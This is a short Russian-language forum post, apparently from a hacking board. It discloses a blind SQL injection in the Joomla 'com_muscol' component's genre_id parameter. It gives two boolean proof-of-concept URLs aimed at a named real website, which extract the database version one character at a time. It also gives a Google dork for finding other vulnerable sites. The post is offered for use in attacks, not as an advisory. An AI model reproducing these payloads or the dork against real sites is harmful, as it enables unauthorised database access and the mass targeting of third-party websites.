09.11.2013, 19:18
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Joomla "com_muscol" component SQL Injection
Уязвим параметр genre_id, в данном компаненте есть и другие уязвимые параметры.
POC:
Сообщение от None
http://www.jazz.org.au/index.php?option=com_muscol&view=search&search=alb ums&genre_id=2+and(select+ascii(mid(concat(version ()),1,1))=53)
- true
Сообщение от None
http://www.jazz.org.au/index.php?option=com_muscol&view=search&search=alb ums&genre_id=2+and(select+ascii(mid(concat(version ()),1,1))=52)
- false
Дорк: "inurl:index.php?option=com_muscol genre_id=*"
Уязвимый код:
Пока нет...
|
|
|